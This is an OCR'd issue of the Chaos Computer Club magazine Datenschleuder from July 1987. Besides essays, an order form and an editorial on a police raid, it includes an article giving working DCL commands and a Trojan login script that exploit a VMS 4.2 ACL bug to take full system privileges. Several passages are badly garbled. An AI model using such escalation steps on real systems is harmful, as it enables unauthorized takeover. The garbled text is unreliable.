I n was f r einer A r t von U m g e b u n g f u n k t i o n i e r t ein Richtiger P r o g r a m m i e r e r a m besten? Das ist eine wichtige F r a g e f r den A u f t r a g g e b e r von Richtigen P r o g r a m m i e r e r n . I n A n b e t r a c h t der Stange G e l d , die ein Stab von M i t a r b e i t e r n kostet, erscheint es a m besten, sie o d e r i h n i n einer optimalen U m g e b u n g u n t e r z u b r i n g e n . Der typische Richtige Programmierer lebt vor einem Computerterminal. U m das Terminal herum liegen die Listings aller Programme, an denen er jemals gearbeitet hat. Diese sind in grob chronologischer Ordnung auf jeder ebenen Flche des Bros gestapelt. Ebenfalls zu finden ist etwa ein halbes Dutzend halbvoller Tassen mit kaltem Kaffee. Gelegentlich schwimmen Zigarettenstummel in dem Kaffee. In einigen Fllen enthalten die Tassen auch Orangensaft. Weiters, auer eT ist wirklich S E H R gut, werden sich Kopien des OS JCL-Handbuchs finden, sowie die 'Principles of Operation', aufgeschlagen auf teilweise recht interessanten Seiten. A n die W a n d geheftet befindet sich ein auf einem Uralt-Printer gedruckter Snoopy-Kalender aus dem Jahre 1969. ber den Boden verstreut liegen die Verpackungen diverser mit Erdnubutter gefllter Ksebrote. Schlielich, in der linken obersten Schreibtischschublade, unter einer Schachtel Kekse, befinden sich Fludiagraimn-Formulare, die ein Vorgnger da zurckgelassen hat. Richtige Programmierer schreiben Programme, keine Dokumentation, die fr das Wartungspersonal hinterlassen wird. Der Richtige Progreammierer ist, unter groem Druck, in der Lage, 30, 40, sogar 50 Stunden in einemdurch zu arbeiten. Er schtzt es, so zu arbeiten. Leerlaufzeiten sind fr den Richtigen Programmierer kein Problem; sie geben ihm die Mglichkeit, ein Mtzchen Schlaf zwischen zwei Compilerdurchgngen zu nehmen. Wenn nicht genug Termindruck auf dem Richtigen Programmierer lastet, tendiert er dazu, die Zgel schleifen zu lassen, indem er in den ersten neun Wochen an einem kleinen, aber interessanten Bereich des Problems herumbastelt. Dann schliet er die gesamte Arbeit in der letzten Woche ab, in zwei oder drei 50-Stunden-Marathons. Das beeindruckt nicht nur seinen Auftraggeber, sondern liefert gleichzeitig eine bequeme Ausrede dafr, da keinerlei Dokumentation vorhanden ist. Generell: Kein Richtiger Programmierer arbeitet von 9 bis 5, auer in der Nacht. Richtige Programmierer tragen auch keine Krawatten. Richtige Programmierer tragen keine hochhackigen Cowboy-

stiefel. Richtige Programmierer treffen gegen Mittag im Bro ein. Ein Richtiger Programmierer wei den Namen seiner Frau, oder er wei ihn auch nicht. Was er auf jeden Fall wei, ist die gesamte ASCII-(oder EBCDIQ-Codetabelle. Richtige Programmierer wissen nicht, wie man kocht. Lebensmittelgeschfte sind selten um 3 Uhr morgens geffnet, also mssen sie mit Keksen und Kaffee berleben. Wirft man einen Blick in die Zukunft, so ziehen einige Richtige Programmierer in Betracht, da die jngste Programmierer-Generation nicht mit den selben Aussichten gro geworden ist wie ihre Eltern. Viele von ihnen haben nie einen Computer mit einer Schalttafel gesehen. Nur wenige, die heute von der Schule kommen, beherrschen Hexadezimalarithmetik ohne einen Taschenrechner. Die heutigen College-Absolventen sind gegenber der harten ProgTammier-Wirklichkeit wie in Watte gepackr durch Source Level Debugger, Text-Editoren, die Klammern zhlen, und benutzerfreundliche Betriebssysteme. A m schlimmsten ist, da einige dieser angeblichen Computerwissenschaftler eine Graduation schaffen, ohne F O R T R A N zu lernen! Steht uns bevor, eine Gesellschaft von Unix-Hackem und Pascal-Programmierem zu werden? Nach meinem Dafrhalten sieht die Zukunft fr Richtige Programmierer nach wie vor glnzend aus. Weder OS/370 noch F O R T R A N zeigen Anzeichen auszusterben, den boshaften Bemhungen von Pascal-Programmierem zum Trotz. Auch sehr subtile Tricks wie etwa der Versuch, F O R T R A N strukturierte Code-Konstrukte unterzujubeln, sind fehlgeschlagen. Ja sicher, ein paar Computerhndler sind mit FORTRAN77-Compilern rausgekommen, aber in jedem von denen gibt es einen Weg, auf dem er sich selbst in einen FORTRAN66-Compiler zurckverwandeln kann - um DO-Schleifen zu compilieren wie Gott es vorgesehen hat. Sogar Unix scheint nicht mehr ganz so schlimm fr Richtige Programmierer zu sein, wie es einmal war. Die letzte Version von Unix hat die Strken eines Betriebssystems, das eines Richtigen Programmierers wrdig ist. Es hat zwei unterschiedliche und subl inkompatible User Interfaces, einen berzogenen und komplizierten DF-Treiber, und virtuellen Speicher. Wenn man von der Tatsache absieht, da es strukturiert ist, kann sogar das Programmieren in C fr einen Richtigen Programmierer annehmbar werden. Es gibt kein Type Checking, Variablennamen sind sieben (10? acht?) Zeichen l a n g , und das Bonbon des Pointer-Datentypsist noch h i n z u g e f g t . E s i s t als htte man d i e besten T e i l e v o n

F O R T R A N und Assembler in einer Sprache; noch ohne an einige der mehr knstlerischen Anwendungen fr define zu denken. Nein, die Zukunft ist nicht dunkel. In den letzten Jahren hat die Presse auchdie glnzende Schar neuer Computerleutchen und Hacker bemerkt, die aus Orten wie Stanford oder M I T in die Richtige Welt rausgehen. Allem Anschein nach lebt der Geist des Richtigen Programmierens in all diesen jungen Mnnern und Frauen weiter. Solange es abartig definierte Sprungziele, bizarre Bugs und unrealistische Tabellen gibt, wird es Richtige Programmierer geben, gewillt einzuspringen, das Problem zu klren und die Dokumentation auf spter zu verschieben. Lang lebe F O R T R A N !

Unix. Festplatten von 20, 30 und mehr M B sind schon fast Standard. Auch nimmt die Zahl der Boxen, die zwei und mehr Ports bieten, in letzter Zeit stndig zu. Vereinzelt sind lobenswerterweise auch endlich Bestrebungen zu erkennen, eine einigermaen einheitliche und bedienerfreundliche Benutzerfhrung (GEONET-kompatibel) einzufhren. Alle diese Entwicklungen sind grundstzlich zu begren. Trotzdem bleibe ich bei meinem doch ziemlich vernichtenden Urteil! Einige Sysops verfallen in einen Technikrausch, was fr sich betrachtet auch noch nichtunbedingt negativ zu bewerten ist. Aberes wird verkannt, da die Technik nur Mittel zum Zweck ist - nicht weniger, aber auch nicht mehr! Denn an dem Inhalt der Boxen wird kaum etwas gendert. Der Inhalt ist und bleibt weitestgehend uninteressant. Jedenfalls fr die groe Mehrzahl von Computerbesitzern, die die D F bisher hat nicht locken knnen. W i e sieht denn heute eine Mailbox aus? Da gibt es die GEONET-Boxen und die vielen regionalen "Freak-Boxen". Die GEONET-Boxen bieten zwar Telex, Intermail und Datenbankzugriffe. Aber sonst? A n den ffentlichen Brettern (und neuerdings sogar in den privaten Fchern - pfui Teufel!) hauptschlich Werbemll kommerzieller Anbieter den man, wenn man darauf steht, in B T X besser und billiger haben knnte. Infolgedessen werden diese Boxen hauptschlich von Firmen und Freiberuflern genutzt, die sich einen geschftlichen Vorteil davon versprechen. Die nicht-kommerziellen regionalen Boxen sind vom Werbemll glcklicherweise bisher verschont geblieben. Interessanter sind sie dennoch nicht. Was bielen sie schon viel mehr als das klassische (und im Prinzip gar nicht schlechte, ja wohl sogar fast unverzichtbare!) Suche, Biete, Allgemeines, Kontakte sowieevtl. ein paar Rechnercomer und wenn es hoch kommt noch einige Programme zum download? (Fast) nichts! Das kann doch wirklich allenfalls einen computerbegeisterten Freak reizen. Ich halte das fr sehr bedauerlich. Mailboxen knnten sehr viel mehr bieten, als den hier angedeuteten Service fr gewisse Kreise von Geschftsleuten einerseits und die Computerfreaks andererseits. Dienste und Informationen, die nicht nur fr diese beiden Gruppen von Computerbesitzer potentiell interessant sind, sondern fr jeden. Bretter wie beispielsweise G.ID, Umwelt, Mitfahrz e n t r a l e in d e r C L I N C H g e h e n s c h o n in d i e r i c h t i g e Richtung, schpfen die potentiellen Mglichkeiten einer M a i l b o x aber noch lange nicht aus. Maiiboxen

Ed Post; WilsonviUe, Oregon; Datamation 7183. (bernommen aus FORTHTREEIHamburg) bersetzung ins Deutsche von Peter Glaser

Mailboxen in den Kinderschuhen


Anmerkungen M i t t l e r w e i l e bin ich seit ca. einem J a h r online. A n l a fr mich, die Mailboxszene einmal kritisch zu beleuchten. M e i n e Ausfhrungen beziehen sich in erster Linie a u f H a m b u r g , drften sich aber i m wesentlichen auf das restliche Bundesgebiet bertragen lassen. Wieviele Anwender mag es wohl in Hamburg geben, die sich mittels D F mehr oder weniger regelmig in den ca. 20 rtlichen Mailboxen tummeln? Ich wrde schtzen, da die Zahl sehr deutlich unter 1.000 liegt. Die Zahl deijeniger aber, denen nur noch ein Akkustikkoppler fr nur ca. D M 200,- (und evtl. noch eine nachrstbare ser. Schnittstelle) fehlt, um D F betreiben zu knnen, wrde ich auf ein paar 10.000 schtzen). W a r u m aber lt die ganz groe Mehrheit der Computerbesitzer die D F und Mailboxen offensichtlich vllig kalt? U n d das, wo in den Computerzeilschriften und der allgemeinen Presse die D F jaalles andere als totgeschwiegen wird? Obwohl die DF so jung nun auch nicht mehr ist? W i e pat das alles zusammen? Ich denke es liegt daran, da die Mailboxen noch immer in den Kinderschuhen stecken. Und sie machen keinerlei erkennbare Anstalten, aus ihnen herauszuwachsen. Gewi, es gibt eine zunehmend grere ZahJ von Boxen, die nicht mehr auf einem C64 mit I80kB-Floppy arbeiten; sondern auf 68kRechnern oder X T ' s , A T ' s und sogar 386er unier

Seite 16

( j f f ^ D i c SnicnStfjIciibcr

Seite 17

knnten preiswerte und top-aktuelle Stadt- und Stadtteilzeitschriften herausgeben. Sie knnten ForumfiirBrgerinitiativen, Parteien, Vereine aller Art sein. Sie knnten Anzeigenbltter ersetzen oder ergnzen. Mailboxen wren das ideale Diskussionsund Informationsforum fr alle nurerdenkliche Themen. Das sind nur wenige Beispiele. Der Phantasie sind kaum Grenzen gesetzt. Aber in dieser Richtung tut sich fast gar nichts. Die meisten Sysops scheint die Technik ihrer Box viel mehr zu interessieren als deren Inhalt. Leicht ist es auch gewiss nicht, hier etwas erfolgreich zu unternehmen. Denn wenn einmal ein interessanter Ansatz unternommen wird, scheitert er meist daran, da sich niemand dafr interessiert. Das liegt eben daran, da bisher nur wenige die D F nutzen, und sich diese wenigen aus zwei ganz speziellen Interessentenkreisen rekrutieren. Aber das hat seine guten Grnde. W i e schon erwhnt, wird in der (Fach-) Presse viel ber D F und Mailboxen berichtet. Wenn man diese Berichte liest, drngt sich der Eindruck auf, D F sei nur etwas fr gestrete Geschftsleute (Typ: jung, dynamisch, erfolglos), die unbedingt in einer amerikanischen Datenbank nach den neuesten Patenten recherchieren mssen, oder aber fr leichenblasse, picklige, pubertre Computerkids, die Tag und Nacht vorm Rechner sitzen, um den Haspa-Coup des C C C nachzuahmen oder sogar zu bertreffen. Mit solchen Darstellungen kann man den durchschnittlichen Computeranwender die D F natrlich nicht schmackhaft machen. D i e relativ wenigen User, die sich von diesen Darstellungen nicht abschrecken lassen, werden aber schnell frustriert, wenn sie sehen, was die D F ihnen zu bieten in der Lage ist. Der Akkustikkoppler verstaubt oder wird wieder verkauft... W i e knnte man aus dieser Misere k o m m e n ? Ich glaube, es mte zweigleisig vorgegangen werden. Einerseits mten sich die Sysops nicht nur u m den technischen, sondern auch und gerade u m den inhaltlichen Ausbau ihrer Boxen verstrkt bemhen. Natrlich kann das nur bei tatkrftiger Mithilfe der User gelingen. Diese ist daher vermehrt anzustreben. Sicherlich ist das leichter gesagt, als getan. Aber der Versuch m u unternommen werden. Daneben mssen aber auch neue User geworben werden. Nicht aus den typischen Kreisen, die schon heute die Boxen benutzen, sondern der "OttoNormal-User" m u angesprochen werden. Dafr m u darauf hingewirkt werden, da die Berichterstattung in der (Fach-)Presse sich wandelt. Auch die Selbstdarstellung der Mailboxen und ComputercSeile 18

lubs lt in diesem Sinne stark zu wnschen brig. Weiterhin mten die User mglichst direkt angesprochen werden. Was wrde es beispielsweise gro kosten, wenn sichdie rtlichen Mailboxen und Computerclubs zusammentten und die Hndler bten, jedem verkauften Computer ein Flugblatt von ihnen beizulegen. Darin knnte dem neuen, stolzen und meist hilflosen Computerbesitzer Hinweise gegeben werden. Z.B., da es neben Spielen und Text- /Datenverarbeitung auch noch D F und Mailboxen gibt. Ganz in seiner Nhe. Preislich und technisch leicht zu erreichen. Und natrlich was das neue Medium gerade ihm an konkreten Vorteilen und Leistungen bietet. Nur das mu halt mehr sein, als das obligate Suche, Biete,... Wenn sich in der hier angedeuteten Richtung nicht etwas bewegt, dann werden wir in einigen Jahren ein paar Boxen haben, die auf einer Cray II laufen, in denen aber bei kaum gestiegenen Userzahlen der gleiche M l l zu lesen sein wird wie heute auf einem PC und frher auf einem C64.

Bestellfetzen Juli 1987


Anzahl Datenschleuder - Abos Sozialabo tr Schler, Studenten usw. fr ein Jahr l 8 Ausgaben} Standardabo trOtto-Normaluser Frderaba fr Gnner. Millionre. Mliardare Mitgliedschaft im C C C einmalige Verwaltungsgebhr Jahresbeitrag fr Schler pipapo Jahresbeitrag fr Nonnatoerdiener Frderbeitrag fr Wohlwollende Mailbox - Teilnahme (nur fr CCC - Mitglieder) INFEX Mfci Bremen, nnr Datex-P Zugang. 3 Ports. Telex usw DU 8.00 UindestnntzuiiH pro Monat Einmalige Eintragungsgebhr CLINCH Hb Hamburg Date*-P und Telefoozugans. Singleport Monatsgebhr DM 5.00. fr Schler DM 2.00 Einmalige Eintragungsgebhr Die Hackerbibel, Teil Gins. DAS Nachschlagewerk fr Hacker usdrarai P A R L A C O M - Studie, CCC/APOC/BHF/DIE GRNEN Computer Rechtslibel zum Umgang mit Autoritten - Was Sie gesen Mikrozensus und Volkszhlung tun knnen C o m p u t e r v i r e n ; MS-DOS IntodisV mit Demovirus & Dokumentation Auftacker 'Chaos - Chnoten', Lturasversion, D- Schild Grlte Aufbacker '8tung Abhrgefahr",64er-Eogen. angeschnitten, postgelb Porto, Verpackung, Trinkgeld, Bussgeld Name Vorname
1

Preis
.O 60.00 120.00

20.00 60.00 120.00 240.00

20.00

10.00 33.33 7.50 5.00 5.00 25.00 10.00 3.33 in

STOEPSEL

Die Datenschleuder N u m e r o 2 2 - Juli 1987 Das wissenschaftliche Fachblatt fr Datenreisende D-2000 Hamburg 20 Schwenckestrasse 85 G e o n e t : Geol:Chaos-Team C L I N C H : Chaos-Team B t x : Chaos,, t e l : 040-4903797 / 040-483752 ViSdP: Reinhard Schrutzki
Herausgeber Chaos Computer Club

Strasse / Hausnummer PLZ/Ort H Hew Member then: Geburtsdatum Telefon tt If Mailbox then: Bentttzeraame. max lu / Passwort zur Einrichtung, max
(Ausschliesslich alphanumerische Grcsszetchen. sowie - und . verwenden. Leerzeichen unzulssig!

Ich zahle die Gesamtsumme tob barC] perV-Scheck O in Postwertzeichen per berweisung Meine Mitgliedsbeitrge zahle ich knftig l~~l halbjhrlich j h r l i c h b a r Q per V-Scheek ia Postwertzeichen per berweisung

(Ort. Datum. Unterschrift) Chaos Computer Club e.V. Sehwenckesr. 95 2000 Haaburs 20 PGitttsA Htnb 5 98 99 - ?01

Mitarbeiter (u.a.): D D T , A. Eichler, P. Franck, H. Grusel, Herward Holland-Moritz, j w i , Marina K e m , K S , M . Kuehn, Andy M.-M., J. Nicolas, padeluun, Poetronic, S. Stahl, S. Wernery. Nachdruck fr nichtgewerbliche Zwecke bei Quellenangabe erlaubt. GutereinDruck i m Selbstverlag. Juli 1987 Sxitcnelrfjlciibcr

ie Sotcnifjlenber

Seite 1 9

I S S N

093 0 -

1045

Wean onzustellbir Anschrift eoiiuscbaitt bitte mit neuer Adresse m rck

tt Bit B W ft ffl W W it m h <t 'j. t a a w n i % a .* i a a . < w t- n * le Jt ) k s m n * n f > m t . K Ll-Hlia 1

eimnA.T.itisituttHii'i^'ii-. m f- is * t t u t . i m ,

I 5 l H X f A S H t *. S.. !( * SI. ) _t m H a i r
t a . 4 m. 7 7 4 8 %

*
C.L.I.N.C.H.
COMPUTER 1 Maiiboxayitama Talafon Dataxanachlufi InDouaa - K o m m u n i k a t i o n r**M i030t MT 34 M S y i t a m SoftwraintIHtion LorlcfiMtr66 - 2000 HamburflSO ' 0 4 0 / 6 3 0 6 2 82 (Die*) S32 3517 0 0 0 b d ) flir iiiiiiri.iinniiiiMiiiiin MEDIENBERATUNG

*
^

+ 1)11 446 9

ti
) f ) f
e

SOFT
m. M o d e m s j^Akustikkoppler y. Kommunikationssoftware

rJAM

^.Festplatten jjt Laufwerke j)L C o m p i l e r j^ST-Sofware

jAW

SOFT

Reinhard

Schrutzki

) f

j f

i f

Seite 2 0

SnfeiiSrfjlcufcer

Editorial

kleiianzeige
AI r liscie r t lu Itomhuro 1CP |i..|.A,,|..ni.. 1/ "" . 5 7 2
Sx-Vf-fc,,,,!,,!:,,. T r .l.

. 7 1 ) 1 1 ; 1 11 1

:,!;

Lieber Leser!
16.9.19^7 Die beste Ausrede fr unser diesmaliges Spterscheinen werden Sie sicherlich schon der Tagespresse entnommen haben. Es bereitet uns einige Schwierigkeiten, diese Datenschleuder mit einem erheblichen Defizit a n Redaktionsmaterial und - T e c h n i k so aufzubereiten, wie sie jetzt hinter uns und vor Ihnen liegt. L e i d e r hat uns das Bundesk r i m i n a l a m t einiger Wissensmaschinen von zent r a l e r Bedeutung f r die Bildschirmtext- u n d Datenschleuder-Redaktion entledigt. Das B K A hat sich bei uns nun also nicht nur eine kostenlose Schulung im Hacken sowie eine Grundausstattung vorsortierter Literatur, sondern auch die persnlichen Daten aller unserer Mitglieder und Abonnenten abgeholt. Jeder Abonnent der Dateschleuder und jedes

162

(',< J<

P60/r,7 36/B7

M^n/

572

Beschlu *!* riMiiiiinii.nuiTiniiifii i|i'i|fn Steffen a r n r jr p o h . m 1 . 1 2 . 1 9 6 1 l n W u p p e r t a l , u..

w e H > d i s c k e

We.lt Raumschiffe.

m ' i r " iii-< h.-.K-iii'ii ifii v < - i r < ; , r d e :

/U'.ulrHhen.s von D a t e r

ilim( li 'l'-M/Jtr niellicitn Hill A n i t ^ r r i r h l

liliH'l ' I i k Anir.i)''M[b1 11;imbui). ALjlP'ling 1 (>?. tz B e l l i

Ani Atil::n| ili't ili'.ill.'im'Mll-.i h.ili li"i ili-in l.;mi|iiflk 11 ||;inil]tlll| wiul ilir- Dui I Inir liiiri 1 KX MK .III W.'Imi unii NH chi ili imi'ilri ti'srliiilli , n.ii.. unii Sdiiiti.'inn nniirli5i3uinr Keraeiy Tlilu,

or/ili"; R^iiiiiiiiiiiini

Steifen

E p p e n d o r f e r I.ejTl.it.r. 165 h e i 2000 Hamburg I O , d e r Ihm g e h r e n d e n Sachen

M i t g l i e d des C C C e.V. ist daher sptestens jetzt beim B K A a k t e n k u n d i g . Es k a n n nicht davon ausgegangen werden, da der Datenschutz gewahrt wird. In diesem Zusammenhang sei darauf hingewiesen, da ein eventueller Proze zur Schaffung von Przedenzfllen fr das zweite W i K G wahrscheinlich zu keinem juristisch brauchbaren Ergebnis, mit Sicherheit aber zu unserem konomischen Exitus fhren wrde, denn trotz ffentlicher uerungen diesbezglich sind bisher leider keine Eingnge von Gorbie oder seinesgleichen auf unseren Konten gutgeschrieben worden. Daher bitten wir die Leser und das Umfeld u m finanzielle Untersttzung zur Grndung eines Prozekostenfonds fr mittellose Hacker. Schlielich pflegen wir fr eben dieses Umfeld gelegentlich unsere Kpfe hinzuhalten, wenn irgendwelche wildgewordenen Ordnungsbehrden blindwtig um sich schlagen. W i r empfehlen, Spenden, die ausschlielich diesem Zweck dienen sollen, durch das Stichwort HACK E R H I L F E " eindeutig zu kennzeichnen. Doch nun zu einer weiteren Folge aus der Serie Pech und Pannen": Die Telefonnummer des Apparates in den Clubrumen (Achtung Abhrgefahr") ist in der letzten Ausgabe zum Leidwesen eines nichtsahnenden Postgeschdigten fehlerhaft abgedruckt worden. Die richtige Nummer lautet:

iiiifl reinri /HX Ki nftlnlitrriiqr- aniippitlnrl


|Vi / I35IC nricliiililiiil'' ist / * v > .iiilqiuml ilpi bishi'tiilcri Etmitlliiiigen vpulai liliri,

ItPinrlnrHin m i t n o c h n i c h t u r e i c h e n d i d M i t l f l i l e r t r n C l u l r a i l 1 ) l l d e m n Hamburg a u s l n d e r Z e l t nach dem 0 1 . O n . 1 9 9 6 J r w s l l r . a l l e i n o f l r ? i < l i ) P i w f t l l e h h a n d e l n d durc). reahrer B P l b a t B n d l R r Hr.ndlunRn, e w e l l d u r c h d l e f l s l b e Itandlunr e ) u n b e f u g t D a t e n , d l n l o h t f U r a l a b a a t l a n t und d l angen u n b e r e c h t i g t e n Zugang b e e o n d e r i i B e a . l c h e r t s i n d , l o h o d r r einem ani1>r"n v e r n c h e f f t r u heben, b) a l n a D a t e n v e r a r b e i t u n g , Ala * U r einen f r a s d a n B e t r i e b a l n fremder U n t e r n e m e n o d a r e i n i e h B n l e r o n w a e a n t l l o h e r B e d e u t u n g l a t , 1 I d u r c h g e a t B r t s u h a b e n , da a l t r o o h t a w l d r i j D a t e n l S n o h t - n , I u n t e r d r c k t e n , unbrauchbar aaohten odar Yerinderten, I n d a 1 J e w a l l a a l l e i n h a n d e l n d o d e r ( a e l n a a a 1 ) K d a ! C o w p u t e r e y a t a w TAX d e r t u r e p i l e o h e n O r * * r - . l > t l o r i f t l r K e r n f o r a o h u n g (Ca) I n Genf f l o h v e l ) e i n d r a n g e n . Daten mixs p k h t a n u n d v e r n d e r t e n , v o k a l W J r t . r und P r l v U a a . n . o T a r f l n d a r t w u r d e n , da f U r d i e | e r a o h t l t e n keine ( W g l l o h k a l t e h r b o t a n d , a u f I h r e l f na l y a t a a s u s u x r M f e n ,

490 37 57
Ein Specht hackt jetzt an unseren Rechnern und wir hacken auf der Schreibmaschine."
Vlc.

-COB2 ) b e l d a r r l r M f h l l l p e I n F r a n k r e i c h I n daa d o r t i g e T U - P ee>p u t o r l y a t o a e i n d r a n g e n , D a t e n ueepMhten u n d H i n d e r t e n ,, w i e A o e o u n t l n * - A * * a n u n t r l a W n awalBachtan. Katmworta o d l f l a l e r t e n u n d Pro frani a u f PytanlTeau h l n m f U g t e n , w o b e i l n b e i d e n f l l l a n * a l den l O r g a n l a a t l o n e n Sohiden a n t e t a n d e n . d i e . i t . n o o b n l o h t rfbeahbar a l n d . * r h . n , t r a f b a r ( > " 202a, JOSe, JOJb, 25 Ab. 1 und ? , 5 2 , 53 StGB. ^ j f f ^ r p i c SnlciiSrfjIciiiicr

SotcnSdilcuiicr

Bits, Bugs & Vaxen

Die Geschichte vom Trojanischen D C L Pferd (Digital Command Language) in V M S V4.2 bietet besonderen Anla zur Aufmerksamkeit. D E C bietet seit der V M S Generation 4.X ein neues S E C U R I T Y Utility an - die A C E ' s und A C L ' s (Access Control Entries/Lists). Ein A C L bietet dem S Y S T E M Manager die Mglichkeit, auf bestimmte Objekte, wie etwa Dateien und Peripherie, nichtprivilegienen Usern Rechte zu gewhren oder eben auch zu verwehren. Seit V M S V4.2 ist nun neu, da A C L s auch auf I . O G I C A L s setzbar sind. Da im Prinzip jeder User A C L s verwenden darf, stellte sich die Frage, ob eben diese auch auf Objekte setzbar wren, deren Berhrung normalerweise SYSTEM-Privilegien erforderte. Die Softwareanalytiker bei D E C unterlieen in V M S V4.2 die Prfung auf das fr eine Modifizierung der SYSTEM-Tabelle erforderliche SYSNAM-Privileg. Dieses ermglicht nun einem nichtpriviligierten User, die S Y S T E M Tabelle mit einem A C L zu versehen, der quivalent mit dem SYSNAM-Privileg smtliche Rechte auf die SYSTEM Tabelle gewhrt. $ SET A C L / O B J E C T = L O G I C A L / A C L = ( I D = * ,ACCESS=R+W+E+D+C) - LNMSSYSTEM-TABLE $ SET ACL/OBJECT=LOGICALMCL=(ID=*,ACCESS=R+W+E+D+C) - LNMSS YSTEM-DIRECTORY Diese beiden DCL-Zeilen bieten mit der I D = * jedem User einer 4.2er V A X die Rechte R=read, W=write, E=execute, D=delete und C=control auf die SYSTEM-Tabelle. Dieser Bug birgt weiterhin das Risiko eines Systemcrashs, falls ein Unerfahrener alle in der SYSTEM-Tabelle befindlichen LOGICALs lscht. Das SYSNAM-Privileg und somit auch dieser A C L zhlen zur Gruppe der SYSTEMPrivilegien, doch dies bedeutet noch lange nicht, alle Privilegien einer V A X zu besitzen. Der Hacker bedient sich des Trojanischen Pferdes, indem er die Mglichkeit nutzt, fremde L O G I C A L s in die SYSTEM-Tabelle einzutragen. Jeder einloggende User durchluft eine ihm zugewiesene loginProzedur. Weist man dieser Prozedur einen L O G I C A L - N a m e n zu, so wird V M S erst dem LOG I C A L folgen und nicht erst die Prozedur namens L O G I N . C O M starten. Im User Authorization File (UAF) wird fr jeden User diese login-Prozedur als L G I C M D definiert. Im Grundzustand verwendet

D E C besagtes L O G I N , falls im U A F bei L G I C M D keine andere Prozedur definiert wurde. $ DEFINE/SYSTEM LOGIN DISK:DIRECTORYTROJANHORSE.COM

Das vom L O G I C A L L O G I N aufgerufene Trojanische D C L Pferd prft die Privilegien jedes einloggenden Users und lt die V A X vom eigenen SYS T E M Manager persnlich sprengen. Als D C L Prozedur bietet sich frmlich an: $ IF F $ P R I V 1 L E G E ( " S E T P R V " ) .EQS. " F A L S E " THEN GOTO NIX $ SET P R O C E S S / P R I V I L E G E = A L L $ SET P R 0 T E C T 1 0 N = ( W : R W E D ) SYSSSYSTEM:S Y S U A F . D A T $ DELETE ' F$LOG I C A L ( " L O G IN") $ DEASSIGN/SYSTEM LOGIN $ NIX: $ SYS$LOGIN:LOGIN.COM Es darf nicht vergessen werden, dieses File auch fr die Benutzung durch World User freizugeben. Der erste einloggende privilegierte Userwird unbemerkt dem Hacker die Kontrolle ber das S Y S T E M anvertrauen. Der Hacker braucht nur noch mittels des UAF-Programms und eventueller Umgehung von mglichen Security-Manahmen seitens des SYSTEM-Managers seinem eigenen Account alle Privilegien zu geben. SYSTEM-Manageroder Hacker knnen natrlich ebenso durch einen A C L die Modifizierbarkeit der SYSTEM-Tabelle verhindern. $ SET ACL/OBJECT=LOGICAL/ACL=(ID=*,ACCESS=R+E) - LNMSSYSTEM-TABLE $ SET ACL/OBJECT=LOGICAL/ACL=(ID=*,ACCESS=R+E) - LNMSS YSTEM-D IRECTORY Diese Methode wurde bereits in der amerikanischen D E C U S Pagewapper Anfang letzen Jahres diskutiert. D E C reagierte damals mit einem VMS-Update auf V4.3, womit dieser DCL-Bug verschwand. Erstaunlicherweise existieren am internationalen Datennetz immer noch Maschinen mit der 4.2er Betriebssystem-Version. Kaum zu glauben, da dort noch nicht einmal der Bug bekannt zu sein scheint.

Erwartungsgem soll j e d e A r t von S o f t w a r e , insbesondere das Betriebssystem einer Rechenanlage, dem A n w e n d e r einen f e h l e r f r e i e n u n d sicheren Betrieb des Computersystems garantieren. Die Systementwickler e n t w e r f e n Programme, ohne auch n u r i m geringsten zu erwarten, da sie a u f A n h i e b k o r r e k t sein w e r d e n . Programmierer verbringen mindestens genau soviel Zeit d a m i t , ihre S o f t w a r e zu testen und eventuellen Fehlern entgegenzuwirken. Was das im einzelnen fr Bugs, also Fehler sind, ist schwer zu sagen. Manche sind sicher harmlos, andere mglicherweise kritisch und fhren zum gefrchteten Systemcrash. Programmierfehler sind nun einmal unvermeidbar, und manchmal auch einfach unauffindbar. Wer dennoch glaubt, da Software Engineering primitiv ist und Fehler grundstzlich vermieden werden knnen, der hat noch keine greren Probleme in algorithmischer Form in Angriff genommen. Die groen Systemhersteller beschftigen Spezialisten ausschlielich fr die Qualittssicherung ihrer Softwareprodukte. Denn sie wissen, da Programmierer eigene Fehler am schwersten finden oder diese gar mit Absicht einbauen knnen. Software wird nicht erst dann zur Benutzung freigegeben, wenn sie nachweisbar korrekt funktioniert, sondern bereits dann, wenn die Hufigkeit, mit der neue Fehler entdeckt werden, a u f ein fr die Geschftsleitung akzeptables Niveau gesunken ist. An-

wender mssen lernen, Fehler und deren Konsequenzen zu erwarten. Ihnen wird gerade von den Hackern hufig erklrt, wie sie bis zur Verbesserung der Software die Fehler umgehen knnen.

Gerade die VAX-Systeme und ihr Betriebssystem V M S von D E C setzen sich aus einfach zu verstehenden und strukturiert aufgebauten SoftwareModulen zusammen. V M S gilt bei den Hackern nicht zu Unrecht als eines von der Qualitt und Systemsicherheit meistgeschtztesten Betriebssysteme der Welt. Doch auch in dem so ausgeklgelten V M S werden immer wieder Bugs entdeckt, die sich als echte Sicherheitslcher des Betriebssystems erweisen. Ziel eines auf Datenreise befindlichen V A X Tftlers ist bekannterweise nicht nur das Eindringen in V A X e n , sondern diese auch unter Kontrolle zu bekommen. U m sich nun nach einem Eindringen in ein VAX-System die ntigen SYSTEM-Privilegien zu verschaffen, sucht der geschickte und erfahrene Hackererst einmal nach dem S E S A M F F N E D I C H des Betriebssystems. Erst wenn dieser gefunden ist und das Reich der Privilegien erschlossen wurde, gilt eine V A X unter Hackern als geknackt bzw. offen. Einige dieser SESAM FFNE DICH-VAX-

Verfahren gingen in die Geschichte ein. Des Hackers wahre Freude ist die Vielzahl und Reichhaltigkeit dieser Verfahren, um rasch als unpriviligierter User den Status des SYSTEM-Managers einzunehmen.

S.Stahl

( ^ f % > i c SnfciiiWjIrukcr

Satcncri/knbce

Die aktuellen Tarife fr's Hacken


I.Teil - - - - - - - - - - - - - - - - - Es mssen also Daten sein, die nicht fr einen bestimmt sind und fr die man keine Zugangsberechtigung hat. Soweit, so gut. Es m u sich also um Daten handeln, die "besonders gesichert" sind, welche man sich oder einen anderen "verschafft". W a s aber ist unter "besonders gesichert" und "verschaffen" i.S.d. 202a S t G B zu verstehen? Fraglich ist vor allem, ob schon ein einfacher und normaler Pawortschutz die Daten besonders sichert. D a es kaum einen simpleren und primitiveren Schutz von Daten gibt als eine Pawortabfrage, kann man also wohl kaum von einer besonderen Sicherung sprechen. Andererseits ist ein Pawort die derzeit technisch unkomplizierteste, wirtschaftlich vertretbarste und zugleich auch praktisch sinnvollste Jede Freizeitbeschftigung hat ihren Preis. Z u den exclusiven, superteuren Hobbies wrde ich das H a c k e n zhlen. N i c h t wegen der wucher h n l i c h e n G e b h r e n der Post. So rgerlich die auch sein mgen, das allein w r e noch 